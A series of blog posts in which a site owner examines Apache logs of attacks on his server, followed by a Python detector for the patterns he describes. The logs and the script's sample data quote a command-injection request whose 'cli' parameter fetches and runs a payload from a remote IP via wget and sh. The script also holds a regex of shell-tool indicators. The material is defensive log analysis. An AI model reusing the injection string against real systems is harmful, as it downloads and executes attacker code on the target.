Monday, June 18, 2018

Learning About System Vulnerabilities from Web Logs 15

Probably after discovering that I don't have phpmyadmin installed, they started saying hello to me every day...
(Though this seems to be a different group from before...)

121.100.124.58 - - [16/Jun/2018:22:26:42 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
86.81.235.216 - - [17/Jun/2018:11:49:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
115.75.217.189 - - [17/Jun/2018:12:10:43 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
89.19.176.201 - - [17/Jun/2018:13:31:06 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
213.14.163.113 - - [17/Jun/2018:13:43:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
87.26.31.65 - - [17/Jun/2018:22:49:06 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"
59.3.28.131 - - [18/Jun/2018:13:46:48 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"

Wednesday, June 6, 2018

Learning About System Vulnerabilities from Web Logs 14

No idea what on earth drygcfp is; I can't block it, and the IPs all come from China, so I'll just block those whole network ranges.

113.63.81.148 - - [06/Jun/2018:13:49:44 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220
110.167.88.198 - - [06/Jun/2018:13:49:48 +0800] "GET /drygcfp232.KXw9KGV.ks3 HTTP/1.1" 404 220
106.45.0.51 - - [06/Jun/2018:13:49:49 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220
124.235.138.148 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpZ0Z.qvckqlm.ag0 HTTP/1.1" 404 220
1.189.141.222 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpR2R.pCTep9f.Sd2 HTTP/1.1" 404 220
150.255.87.74 - - [06/Jun/2018:13:50:06 +0800] "GET /drygcfpTwT.OHyaOjG.hIw HTTP/1.1" 404 220
110.167.94.132 - - [06/Jun/2018:13:50:21 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220

Tuesday, June 5, 2018

Learning About System Vulnerabilities from Web Logs 13

This phpmyadmin intrusion test has several characteristics: each test lasts about a minute, each test uses a single IP (a different IP every time, so the firewall can't block it well), and it starts with these two requests: "PROPFIND / HTTP/1.1" 405 236 "-" "-" and "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 226 "-" ". When I set up the site earlier I used a small program that automatically added a source to the firewall block list when the site received a large number of access requests in a short time, but that program blocked normal access too, so I stopped using it. Using Apache's deny rules only turns error 404 into 403, which is pointless. I'll keep looking for a way to solve this.
47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "PROPFIND / HTTP/1.1" 405 236 "-" "-"
47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"
47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /index.php HTTP/1.1" 404 207 "-" "Mozilla/5.0"
47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"
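As an added example (not the blog's own tooling), the Python script below parses the Apache lines quoted in posts 13, 14 and 15 and flags each of the three patterns the author describes: the URL-encoded shell command smuggled into the `cli` parameter of `/login.cgi`, the `drygcfp` random-path probe spread across many source IPs, and the single-IP phpmyadmin scan that opens with `PROPFIND /` and `POST /wls-wsat/CoordinatorPortType`. The thresholds (an 8-character path prefix, three IPs and three distinct paths for a cluster, a 60-second window for a burst) are assumptions chosen to fit these excerpts, and the benign request from 192.0.2.10 is constructed; the other sample lines are the ones quoted in the posts.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Sample input: lines quoted in the three posts plus one constructed benign
# request (192.0.2.10) to show that ordinary traffic is not flagged.
SAMPLE_LINES = [
    '121.100.124.58 - - [16/Jun/2018:22:26:42 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"',
    '86.81.235.216 - - [17/Jun/2018:11:49:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 207 "-" "Hello, World"',
    '113.63.81.148 - - [06/Jun/2018:13:49:44 +0800] "GET /drygcfpwnw.ASWjAir.5Fn HTTP/1.1" 404 220',
    '110.167.88.198 - - [06/Jun/2018:13:49:48 +0800] "GET /drygcfp232.KXw9KGV.ks3 HTTP/1.1" 404 220',
    '124.235.138.148 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpZ0Z.qvckqlm.ag0 HTTP/1.1" 404 220',
    '1.189.141.222 - - [06/Jun/2018:13:50:05 +0800] "GET /drygcfpR2R.pCTep9f.Sd2 HTTP/1.1" 404 220',
    '47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "PROPFIND / HTTP/1.1" 405 236 "-" "-"',
    '47.89.10.162 - - [05/Jun/2018:09:02:47 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"',
    '47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /index.php HTTP/1.1" 404 207 "-" "Mozilla/5.0"',
    '47.89.10.162 - - [05/Jun/2018:09:02:50 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Jun/2018:14:00:01 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# Apache common and combined log lines (referer/UA optional), which covers
# both shapes that appear in the posts.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

# 1. Command injection in a query parameter: decode the query string and look
#    for shell metacharacters, download/execute commands and /tmp drop paths.
SHELL_INDICATORS = re.compile(r"[;|`$>]|\b(?:wget|curl|sh|bash|nc)\b|/tmp/")

def injection_indicators(rec):
    """Return the distinct shell indicators found in the decoded query string."""
    if "?" not in rec["path"]:
        return []
    query = unquote(rec["path"].split("?", 1)[1])
    return sorted({m.group(0) for m in SHELL_INDICATORS.finditer(query)})

# 2. Distributed random-path probe: one fixed prefix, a random suffix and a
#    different source IP for almost every request (the drygcfp lines).
def probe_clusters(records, prefix_len=8, min_ips=3, min_paths=3):
    """Map path prefix -> set of IPs for prefixes requested under many distinct
    paths from many distinct IPs, counting only 404 responses."""
    ips, paths = defaultdict(set), defaultdict(set)
    for r in records:
        if r["status"] != "404":
            continue
        prefix = r["path"].split("?", 1)[0][:prefix_len]
        ips[prefix].add(r["ip"])
        paths[prefix].add(r["path"])
    return {p: ips[p] for p in ips if len(ips[p]) >= min_ips and len(paths[p]) >= min_paths}

# 3. Single-IP scanner burst: the PROPFIND / and POST /wls-wsat/... opener
#    followed by about a minute of path guessing from the same IP.
OPENER = {("PROPFIND", "/"), ("POST", "/wls-wsat/CoordinatorPortType")}

def scanner_bursts(records, window=timedelta(seconds=60)):
    """Return {ip: request_count} for IPs that sent both opener requests within
    one window. Keyed on the signature rather than the request rate, so a busy
    but legitimate client is not swept up the way a pure rate limiter would."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)
    hits = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            in_window = [r for r in recs[i:] if r["ts"] - first["ts"] <= window]
            seen = {(r["method"], r["path"]) for r in in_window}
            if OPENER <= seen:
                hits[ip] = len(in_window)
                break
    return hits

def block_candidates(lines):
    """IPs flagged by any of the three detectors, ready for a firewall rule."""
    records = [r for r in map(parse_line, lines) if r]
    flagged = {r["ip"] for r in records if injection_indicators(r)}
    for ips in probe_clusters(records).values():
        flagged |= ips
    flagged |= set(scanner_bursts(records))
    return flagged

if __name__ == "__main__":
    for ip in sorted(block_candidates(SAMPLE_LINES)):
        print(ip)
```

Running the script prints the seven flagged source addresses and leaves 192.0.2.10 alone. The burst detector is the piece that addresses the complaint in post 13: a rate-based blocker fires on volume alone and catches normal users, whereas triggering on the fixed two-request opener adds the scanning IP to the block list without ever counting ordinary traffic, and blocking at the firewall stops the rest of the minute-long scan instead of merely changing 404 into 403.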